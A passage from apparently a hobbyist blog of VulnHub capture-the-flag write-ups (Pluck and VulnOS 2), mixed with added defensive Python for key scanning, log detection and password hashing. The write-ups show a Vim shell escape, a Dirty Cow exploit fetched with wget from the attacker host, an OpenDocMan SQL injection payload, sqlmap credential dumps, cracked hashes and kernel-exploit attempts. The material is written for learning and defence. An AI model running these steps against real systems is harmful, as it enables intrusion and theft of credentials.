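As an added example (not the post's own code), the defender-side check for exactly this finding: a stdlib Python scanner that walks a backup tar and reports any member containing a complete PEM private-key block, and keeps what it found if the archive is truncated like the cancelled download above. The archive contents are constructed for the example and the key inside is a dummy, not real key material.

```python
"""Scan a backup tar archive for embedded private key material.

Added example, not code from the post: a defender-side check for the finding
above, an SSH private key sitting in a backup that the web server can serve.
Standard library only.
"""
import io
import re
import tarfile

# PEM markers for the private key formats OpenSSH writes; the post's key used
# the "RSA PRIVATE KEY" header.  Group 1 captures the key type.
KEY_BEGIN = re.compile(rb"-----BEGIN ([A-Z0-9 ]*?PRIVATE KEY)-----")
KEY_END = re.compile(rb"-----END ([A-Z0-9 ]*?PRIVATE KEY)-----")
MAX_MEMBER_BYTES = 8 * 1024 * 1024  # keys are tiny; skip large blobs


def find_private_keys(archive):
    """Return [(member_name, key_type), ...] for every regular file in the
    archive holding a complete PEM private key block.

    `archive` is a path or a binary file-like object.  A truncated archive
    (like the cancelled 2 GB download in the post) is scanned up to the cut.
    """
    if isinstance(archive, (str, bytes)):
        tar = tarfile.open(archive, mode="r:*")
    else:
        tar = tarfile.open(fileobj=archive, mode="r:*")
    hits = []
    with tar:
        try:
            for member in tar:
                if not member.isfile() or member.size > MAX_MEMBER_BYTES:
                    continue
                fobj = tar.extractfile(member)
                if fobj is None:
                    continue
                data = fobj.read()
                for begin in KEY_BEGIN.finditer(data):
                    key_type = begin.group(1).decode("ascii")
                    end = KEY_END.search(data, begin.end())
                    # Count the block only if the END marker names the same type.
                    if end and end.group(1).decode("ascii") == key_type:
                        hits.append((member.name, key_type))
        except tarfile.ReadError:
            pass  # hit the truncation point; report what was found so far
    return hits


def build_sample_backup():
    """Constructed sample: an in-memory home-directory tar like the post's
    backup.tar, with a dummy (not real) RSA key under .ssh/."""
    fake_key = (b"-----BEGIN RSA PRIVATE KEY-----\n"
                b"MIIEconstructedDUMMYkeyMATERIALnotAREALkey000000000000000000\n"
                b"-----END RSA PRIVATE KEY-----\n")
    files = {
        "home/paul/.bashrc": b"export PS1='\\u@\\h:\\w\\$ '\n",
        "home/paul/.ssh/id_rsa": fake_key,
        "home/paul/.ssh/id_rsa.pub": b"ssh-rsa AAAAB3constructedPUBKEY paul@pluck\n",
        "home/paul/notes.txt": b"backup script runs nightly from cron\n",
    }
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, content in files.items():
            info = tarfile.TarInfo(name=name)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    buf.seek(0)
    return buf


if __name__ == "__main__":
    for name, key_type in find_private_keys(build_sample_backup()):
        print(f"{name}: contains a {key_type}")
```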
<br />
I named the file deployment-key.txt and edited permissions to 600;<br />
<span style="color: lime;">chmod 600 deployment-key.txt</span><br />
<br />
Then tried to log in over ssh yet again, but now as user paul with the ssh-rsa key;<br />
<span style="color: lime;">ssh -i deployment-key.txt paul@192.168.110.102</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_pdm_1_zpsxottjfij.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="484" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_pdm_1_zpsxottjfij.png" width="640" /></a></div>
OK, well this is different.. well I guess the passwd file did mention /usr/bin/pdmenu for user paul..<br />
<br /></div>
After messing around a bit with telnet and WWW, I tried the edit file option, remembering a trick a pal had once shown me: gaining access by simply adding a user to the passwd file.<br />
<br />
So I decided to try and open up the /etc/passwd file.<br />
<br />
oh fuck.. Vim.. I seriously need to learn to use this.. how many times I have gotten stuck in it and have had to google how to just friggin exit the editor is just downright embarrassing.<br />
<br />
So after spending a bit of time on trying to edit the file to get it to open and be able to break out into shell, I noticed that the file was, of course, read-only [facepalm]..<br />
<br />
Breaking out of Vim is well-documented, and a quick google session later I found the hidden gold I needed;<br />
<a href="https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells" target="_blank">https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells</a><br />
<br />
In Vim command mode;<br />
<span style="color: lime;">:set shell=/bin/bash</span><br />
<span style="color: lime;">:shell</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_vim_zpsc7n5xokk.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="552" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_vim_zpsc7n5xokk.png" width="640" /></a></div>
Bingo! shell!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_vim-escape_zpsdxpxdfhf.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="124" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_vim-escape_zpsdxpxdfhf.png" width="640" /></a></div>
A bit of googling showed I could probably try an easy way to root: the Dirty Cow exploit.<br />
<br />
I hosted the Dirty Cow exploit 40616.c on my attacking system and changed to the writable /tmp directory on Pluck to wget the exploit to the target.<br />
Then following the instructions in the exploit I compiled it with gcc.<br />
<br />
<span style="color: lime;">wget 192.168.110.101/40616.c</span><br />
<span style="color: lime;">gcc -o cow 40616.c -pthread</span><br />
It compiled with some warnings, but fingers crossed..<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_gcc_zpswfywscvn.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="528" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_gcc_zpswfywscvn.png" width="640" /></a></div>
I chmod-ed the file to make it executable, and ran it..<br />
<span style="color: lime;">chmod +x cow</span><br />
<span style="color: lime;">./cow</span><br />
<br />
Fuck Yeah..!<br />
rootdance!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/girl-dancing-excited_zpshdy9aldv.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="140" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/girl-dancing-excited_zpshdy9aldv.gif" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
I immediately ran the command to make the exploit more stable and avoid freezes on the target system (without this step, the target system froze pretty quickly for me);<br />
<span style="color: lime;">echo 0 > /proc/sys/vm/dirty_writeback_centisecs</span><br />
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_cow_zpsrowyvd55.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" height="256" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_cow_zpsrowyvd55.png" width="640" /></a><br />
<br />
<br />
Checked out the /root dir;<br />
<span style="color: lime;">ls /root</span><br />
<span style="color: lime;">cat /root/flag.txt</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_flag_zpsjazm92vz.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="498" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_flag_zpsjazm92vz.png" width="640" /></a></div>
Big thanks to the creator and to VulnHub for hosting these awesome challenges :D<br />
<div style="text-align: center;">
<b>Happy & Content :)</b></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://media.licdn.com/mpr/mpr/p/7/005/04a/3f0/1c58170.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="223" src="https://media.licdn.com/mpr/mpr/p/7/005/04a/3f0/1c58170.jpg" width="320" /></a></div>
<b><u>Tools used; </u></b><br />
<br />
HOST DISCOVERY<br />
- netdiscover<br />
- arp-scan<br />
<br />
PORT SCANNING<br />
- nmap<br />
<br />
FORCED BROWSING<br />
- dirb<br />
- dirbuster<br />
- wfuzz<br />
<br />
VULNERABILITY CHECKS / SCANNING<br />
- nikto<br />
- searchsploit<br />
<br />
FILE TRANSFER<br />
- wget<br />
- curl<br />
<br />
<br />
Speshull thanx to guugl :P<br />
<br /></div>
<b>VulnHub -- VulnOS: 2 -- Writeup</b> (published 2016-05-20, updated 2016-06-06)<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<b>Cracking VulnOS: 2</b><br />
<b>================</b><br />
So trying my hand at another VulnHub VM.. after having failed miserably at Gibson, which was awesomely <a href="http://ch3rn0byl.com/gibson-walkthrough/" target="_blank">busted </a>by <a href="http://forum.top-hat-sec.com/index.php" target="_blank">THS </a>bud ch3rn0byl, I was hoping for an easy 'pick-me-up' ..<br />
Yah.. didn't happen..<br />
<br />
The more I think I know, the more I realise I don't.. sometimes annoying, but mostly fueling the fire :D *roar!*<br />
<br />
<b><span style="color: yellow;">Getting target(s)</span></b><br />
<b><span style="color: yellow;">=============</span></b><br />
<span style="color: lime;">netdiscover -i eth0 -P -r 192.168.56.0/24</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/ranger-01_zpsn1qoi4or.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/ranger-01_zpsn1qoi4or.png" height="240" width="640" /></a></div>
And then the obligatory nmap;<br />
<span style="color: lime;">nmap -T4 -A 192.168.56.104</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/zenmap-01_zpsu1zdnjnh.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/zenmap-01_zpsu1zdnjnh.png" height="574" width="640" /></a></div>
Open up the webpage to see a link to the company's webserver;<br />
<b>/jabc</b><br />
<br />
After a bit of browsing and learning about <a href="https://en.wikipedia.org/wiki/Lorem_ipsum" target="_blank">text fillers</a> (grrrrr...) I found a link to the 'documentation';<br />
<b>/jabcd0cs/</b>, cunningly obscured with the same colour as the background.. sneaky..<br />
We are advised we can log in as guest with <b>guest/guest</b>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/browser-01_zpsa3njaqgy.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/browser-01_zpsa3njaqgy.png" height="372" width="640" /></a></div>
Alright, this looks promising: a document management system called OpenDocMan. Logging in as guest and looking around, we see it allows uploads; sweet, let's give it a shot!!<br />
<br />
Let's try uploading a php reverse shell to see if we can get lucky!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/opendocman-02_zpsvkyodde9.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/opendocman-02_zpsvkyodde9.png" height="165" width="400" /></a></div>
<i>Booo... can't upload shells</i><br />
hmm.. OK, so it is limited, but it also shows that admin can edit the file list.. OK, target acquired..<br />
<br />
<br />
<b><span style="color: yellow;">I can has admin ?</span></b><br />
<b><span style="color: yellow;">=============</span></b><br />
The version is nicely printed at the bottom of the screen, so we run searchsploit to see if there are any known vulnerabilities.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/opendocman-01_zpsftuxegqo.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/opendocman-01_zpsftuxegqo.png" height="140" width="320" /></a></div>
<i>Nice and clear version info</i><br />
<span style="color: lime;">searchsploit opendocman 1.2.7</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/searchsploit-01_zpshsw0a3kt.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/searchsploit-01_zpshsw0a3kt.png" height="130" width="400" /></a></div>
<i>Ooohh... Multiple..</i><br />
<span style="color: lime;">cat /usr/share/exploitdb/platforms/php/webapps/32075.txt</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/searchsploit-02_zpsqw8diwdn.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/searchsploit-02_zpsqw8diwdn.png" height="403" width="640" /></a></div>
Alright, an SQLi vulnerability as well as an exploit to get admin access/rights on the OpenDocMan system.<br />
Guest does not have admin privs; I want to try to upload a reverse shell and need admin privs to do that, so I decide to try to get admin privs first.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/user-01_zpsg4ox3enk.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/user-01_zpsg4ox3enk.png" height="320" width="240" /></a></div>
<i>no admin privs :(</i><br />
I copy the form information and create an html file accordingly, edit to reflect guest's user ID, upload with my guest account, view it, click on "Run".. and check guest's credentials again..<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/form-exploit-01_zpsiorzlkpd.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/form-exploit-01_zpsiorzlkpd.png" height="98" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/file-upload-01_zps1i8hviuq.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/file-upload-01_zps1i8hviuq.png" height="337" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/form-exploit-02_zpsikswy7nw.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/form-exploit-02_zpsikswy7nw.png" height="111" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/user-02_zpsgb5ii0in.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/user-02_zpsgb5ii0in.png" height="400" width="322" /></a></div>
<i>Game on! admin privs..</i><br />
But wait... still can't alter allowed filetypes.. Booo..<br />
<br />
Putting my thinking cap back on; despite other accounts being admin, maybe the only admin user allowed access is user #1 ?<br />
I go to update users, find the webmin account and update its password to 12345.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/user-03_zpshmjytakg.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/user-03_zpshmjytakg.png" height="400" width="318" /></a></div>
<i>Awesome, admin privs allow guest to edit another user's password</i><br />
Then see whether I can now log in as webmin with better access control.<br />
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/admin-panel-01_zpsbdwuogd5.png" imageanchor="1" style="clear: left; display: inline !important; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/admin-panel-01_zpsbdwuogd5.png" height="292" width="320" /></a><br />
<i>FuckYeah... I has full admin..</i><br />
<b><span style="color: yellow;">Teh Failz</span></b><br />
<b><span style="color: yellow;">=======</span></b><br />
So now when heading over to the admin panel I see I can alter the allowed filetypes; let's get php up in there and try to get a reverse shell going..<br />
Hmm uploads fine, but it <b>won't</b> execute..<br />
<br />
OK, just for shits and giggles, let's see if ImageMagick is used in any way, allowing an ImageTragick attack when uploading a malicious png..<br />
<b>Nope</b>..image is not displayed. Bah.<br />
<br />
OK, well since the webform worked OK, how about some java ?<br />
I make a test html file with some simple java, upload it and view it; well, that worked OK.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/javatest-01_zpsrferhjyx.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/javatest-01_zpsrferhjyx.png" height="195" width="400" /></a></div>
<i>This test works, but failed to weaponize it :(</i><br />
how about trying to make a java reverse shell ?<br />
<br />
This is where I spent way too much time messing about; I tried to somehow weaponize the java but simply lack the skills needed for this.<br />
I had found what was reportedly a java reverse shell, but failed miserably in trying to get this to run from within the html.<br />
<i>(Any pointers from teh pr0z on what I could have done greatly appreciated!)</i><br />
<br />
So after a while (ok, a fu*kin long time) decided that this was probably not going to be the way in; after googling my arse off I could find no reference to leveraging uploaded files in OpenDocMan to get a shell, so it was time to move on..<br />
<br />
What a waste of time..pfff, oh well I'm sure (or rather hopeful.. lol) I learned something..<br />
<br />
<br />
<b><span style="color: yellow;">Getting a foot in the door - SQLi</span></b><br />
<b><span style="color: yellow;">=========================</span></b><br />
So the 1st item in the list of opendocman exploits was an SQLi vulnerability;<br />
<br />
1) SQL Injection in OpenDocMan: CVE-2014-1945<br />
<i>The vulnerability exists due to insufficient validation of "add_value" HTTP GET parameter in "/ajax_udf.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.</i><br />
The exploitation example below displays version of the MySQL server:<br />
<i>http://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9</i><br />
<div>
<br /></div>
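Added example, not code from either post: the Pluck <b>index.php?page=../../</b> traversal earlier on this page and this OpenDocMan <b>add_value</b> injection both ride a single GET parameter, so one piece of detection logic covers both. This stdlib Python parses Apache combined-format access log lines (constructed for the example, reusing the request paths from the two writeups), percent-decodes each query parameter up to twice, and flags <b>../</b> sequences and <b>UNION SELECT</b>.

```python
"""Flag path-traversal and UNION SELECT injection attempts in web access logs.

Added example, not code from either post.  Both writeups ride a single GET
parameter: Pluck's index.php?page=../../... and OpenDocMan's
ajax_udf.php?add_value=odm_user UNION SELECT ... .  The lines below are
Apache combined-format log entries constructed for the example, reusing the
request paths shown in the two writeups.  Standard library only.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")
UNION_RE = re.compile(r"\bunion\b\s+(all\s+)?select\b", re.IGNORECASE)

SAMPLE_LOG = [
    '192.168.110.101 - - [18/Feb/2019:16:43:00 +0100] "GET /index.php?page=about HTTP/1.1" 200 1532',
    '192.168.110.101 - - [18/Feb/2019:16:43:07 +0100] "GET /index.php?page=../../../../../../../../../../usr/local/scripts/backup.sh HTTP/1.1" 200 812',
    '192.168.110.101 - - [18/Feb/2019:16:43:09 +0100] "GET /index.php?page=%252e%252e%252fbackups%252fbackup.tar HTTP/1.1" 200 2048',
    '192.168.56.1 - - [20/May/2016:17:34:00 +0200] "GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9 HTTP/1.1" 200 95',
    '192.168.56.1 - - [20/May/2016:17:34:02 +0200] "GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user HTTP/1.1" 200 60',
]


def decode_param(value, rounds=2):
    """Percent-decode repeatedly (up to `rounds`) so double-encoded input
    such as %252e%252e%252f is normalised before matching."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyse_line(line):
    """Return [(rule, param, decoded_value), ...] for one log line; an
    unparseable or clean line yields []."""
    m = LOG_RE.match(line)
    if not m:
        return []
    findings = []
    query = urlsplit(m.group("url")).query
    # parse_qsl already decodes one layer and turns '+' into spaces.
    for name, raw in parse_qsl(query, keep_blank_values=True):
        value = decode_param(raw)
        if TRAVERSAL_RE.search(value):
            findings.append(("path-traversal", name, value))
        if UNION_RE.search(value):
            findings.append(("sqli-union", name, value))
    return findings


def scan_log(lines):
    """Return [(client_ip, findings), ...] for every line that fired a rule."""
    alerts = []
    for line in lines:
        findings = analyse_line(line)
        if findings:
            alerts.append((LOG_RE.match(line).group("ip"), findings))
    return alerts


if __name__ == "__main__":
    for ip, findings in scan_log(SAMPLE_LOG):
        for rule, param, value in findings:
            print(f"{ip}: {rule} in {param!r}: {value}")
```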
Alright, let's do some quick checks..<br />
The exploit example makes use of the <b>'add_value=odm_user'</b> parameter for an SQL injection attack, so let's see what information can be found with sqlmap;<br />
<span style="color: lime;">sqlmap -u 'http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user'</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/sql-01_zpsxljpasrk.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/sql-01_zpsxljpasrk.png" height="320" width="640" /></a></div>
Alright, that seems to show a positive return..<br />
<br />
Now to check out which databases we can see;<br />
<span style="color: lime;">sqlmap -u 'http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user' --dbs</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/sql-02_zps0xkxo6ri.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/sql-02_zps0xkxo6ri.png" height="252" width="640" /></a></div>
Then check out the tables of the jabcd0cs database;<br />
<span style="color: lime;">sqlmap -u 'http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user' -D jabcd0cs --tables</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/sql-03_zpsrs0kwndw.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/sql-03_zpsrs0kwndw.png" height="323" width="640" /></a></div>
And then check what can be found in the odm_user table ;<br />
<span style="color: lime;">sqlmap -u 'http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user' -D jabcd0cs -T odm_user --columns</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/sql-04_zpsx0s2d4sm.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/sql-04_zpsx0s2d4sm.png" height="288" width="640" /></a></div>
ooohhhhhh.. username AND password.. that'll do me just fine..<br />
let's dump it !<br />
<span style="color: lime;">sqlmap -u 'http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user' -D jabcd0cs -T odm_user --dump</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/sql-05_zpslym83puh.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/sql-05_zpslym83puh.png" height="179" width="640" /></a></div>
<br />
<br />
<i>yay hashes..</i><br />
<br />
<br />
<b><span style="color: yellow;">Gaining Access</span></b><br />
<b><span style="color: yellow;">============</span></b><br />
OK, so what are these password hashes?<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/hashid-01_zpsdgzgvhnz.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/hashid-01_zpsdgzgvhnz.png" height="231" width="400" /></a></div>
<i>Cool, MD5</i><br />
For MD5, there are great online crackers which are truly hard to beat..<br />
Sure you can do it hardcore yourself, but there are so many hashes already online and cracked, that sometimes a simple google search will actually already turn up the answer.<br />
In this case google doesn't.. so onto <a href="http://md5cracker.org/">MD5cracker.org</a> ..<br />
<i>(Thanks H4v0K for the hint on that site, I had tried others with no success!)</i><br />
<br />
success!<br />
<blockquote class="tr_bq">
<span style="color: #999999;">084e0343a0486ff05530df6c705c8bb4:guest<br />b78aae356709f8c31118ea613980954b:webmin1980</span></blockquote>
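Added example (not the post's code) of what the cracked pair above shows: the guest hash is a bare MD5 of the password, so any precomputed table answers it. The stdlib Python below confirms that scheme from an account whose password is known, and shows the salted PBKDF2-HMAC-SHA256 storage that defeats a lookup; the iteration count follows OWASP's published guidance for PBKDF2-SHA256.

```python
"""Check a stored password hash for unsalted MD5, and store passwords properly.

Added example, not code from the post.  The dump gave 084e03...:guest, i.e.
md5("guest") stored as-is: no salt, no work factor, so one lookup in a
precomputed table recovers it.  A random per-user salt plus a slow KDF
(PBKDF2-HMAC-SHA256 from the standard library) yields a different record
for the same password every time, so no table can be built in advance.
"""
import hashlib
import hmac
import os

PBKDF2_ITERATIONS = 600_000  # OWASP guidance for PBKDF2-HMAC-SHA256


def identify_scheme(stored_hash, known_password):
    """Audit helper: with an account whose password you know (the post's
    guest/guest), tell whether the stored value is plain MD5 of it."""
    candidate = hashlib.md5(known_password.encode()).hexdigest()
    if hmac.compare_digest(candidate, stored_hash.strip().lower()):
        return "unsalted-md5"
    return "unknown"


def store_password(password, salt=None):
    """Return a self-describing record: pbkdf2_sha256$iterations$salt$digest
    (salt and digest hex).  `salt` is only overridable for tests."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(record, password):
    """Recompute with the salt and iteration count stored in the record and
    compare in constant time.  Malformed records verify as False."""
    try:
        algo, iterations, salt_hex, digest_hex = record.split("$")
        if algo != "pbkdf2_sha256":
            return False
        digest = hashlib.pbkdf2_hmac(
            "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
        )
    except ValueError:
        return False
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    print(identify_scheme("084e0343a0486ff05530df6c705c8bb4", "guest"))  # unsalted-md5
    rec = store_password("guest")
    print(rec)
    print(verify_password(rec, "guest"), verify_password(rec, "wrong"))
```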
Sooooo can we use these passwords to log in ?<br />
<br />
I try to log into ssh with guest | guest ;<br />
<span style="color: lime;">ssh guest@192.168.56.104</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/ssh-02_zpsswq6zmds.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/ssh-02_zpsswq6zmds.png" height="103" width="400" /></a></div>
<br />
<br />
<i>failed with password 'guest' :(</i><br />
trying with webmin | webmin1980;<br />
<span style="color: lime;">ssh webmin@192.168.56.104</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/ssh-01_zpscha9j183.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/ssh-01_zpscha9j183.png" height="188" width="400" /></a></div>
<i>whaaa ! I'm in !</i><br />
First thing that catches my eye is the Ubuntu 14.04.04 LTS.<br />
This I have seen before and have used a local exploit on with success, using one of the ofs exploits..<br />
Anyway I have a quick browse around but find nothing of interest.<br />
<br />
So let's spawn a terminal, find a writable directory and try a couple of the good 'ol ofs exploits;<br />
<span style="color: lime;">python -c 'import pty; pty.spawn("/bin/bash")'</span><br />
<div>
<br /></div>
<div>
I precompiled the exploit-db ofs exploits 37292 & 39166 and have them sitting in my exploitz directory along with the ofs exploits from kernel-exploits.com.</div>
No success with the compiled exploit_db exploits, however I have learned that one should try them all !<br />
So I uploaded the trusty ofs_32 from kernel-exploits.com and gave that one a whirl..<br />
<div class="separator" style="clear: both; text-align: center;">
